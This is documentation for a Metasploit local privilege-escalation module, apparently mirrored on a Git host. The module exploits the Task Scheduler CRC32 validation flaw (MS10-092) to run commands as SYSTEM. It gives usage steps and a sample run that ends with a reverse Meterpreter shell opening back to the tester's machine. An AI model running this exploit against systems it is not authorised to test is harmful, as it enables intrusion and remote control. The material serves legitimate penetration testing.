adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
9beec65ef34c4e90a00a41ee1c8de0f9e6effd2a
metasploit-gs/documentation/modules/exploit/windows/local/ms10_092_schelevator.md
T

2.3 KiB
Raw Blame History

Vulnerable Application

This module exploits the Task Scheduler 2.0 XML 0day exploited by Stuxnet. When processing task files, the Windows Task Scheduler only uses a CRC32 checksum to validate that the file has not been tampered with. Also, In a default configuration, normal users can read and write the task files that they have created. By modifying the task file and creating a CRC32 collision, an attacker can execute arbitrary commands with SYSTEM privileges.

Scenarios

Verification Steps

  1. Start msfconsole
  2. Do: use modules/exploits/windows/local/ms10_092_schelevator
  3. Do: set SESSION [#]
  4. Do: run

A run on Windows Vista (Build 6000) and Kali Linux 2019.3

msf > use modules/exploits/windows/local/ms10_092_schelevator
msf exploit(windows/local/ms10_092_schelevator) > set SESSION 1
  SESSION => 1
msf5 exploit(windows/local/ms10_092_schelevator) > run  
  [*] Started reverse TCP handler on 192.168.1.3:4444
  [*] Preparing payload at C:\Users\test\AppData\Local\Temp\CItOOtB.exe
  [*] Creating task: TzAZ6H4K
  [*] SUCCESS: The scheduled task "TzAZ6H4K" has successfully been created.
  [*] SCHELEVATOR
  [*] Reading the task file contents from C:\Windows\system32\tasks\TzAZ6H4K...
  [*] Original CRC32: 0x69b1db25
  [*] Final CRC32: 0x69b1db25
  [*] Writing our modified content back...
  [*] Validating task: TzAZ6H4K
  [*]
  [*] Folder: \
  [*] TaskName                                   Next Run Time        Status
  [*] ========================================== ==================== ===============
  [*] TzAZ6H4K                                   12/1/2019 10:41:00 A Ready
  [*] SCHELEVATOR
  [*] Disabling the task...
  [*] SUCCESS: The parameters of scheduled task "TzAZ6H4K" have been changed.
  [*] SCHELEVATOR
  [*] Enabling the task...
  [*] SUCCESS: The parameters of scheduled task "TzAZ6H4K" have been changed.
  [*] SCHELEVATOR
  [*] Executing the task...
  [*] Sending stage (180291 bytes) to 192.168.1.2
  [*] SUCCESS: Attempted to run the scheduled task "TzAZ6H4K".
  [*] SCHELEVATOR
  [*] Deleting the task...
  [*] Meterpreter session 2 opened (192.168.1.3:4444 -> 192.168.1.2:49249) at 2019-11-27 10:42:02 -0700
  [*] SUCCESS: The scheduled task "TzAZ6H4K" was successfully deleted.
  [*] SCHELEVATOR
Reference in New Issue View Git Blame Copy Permalink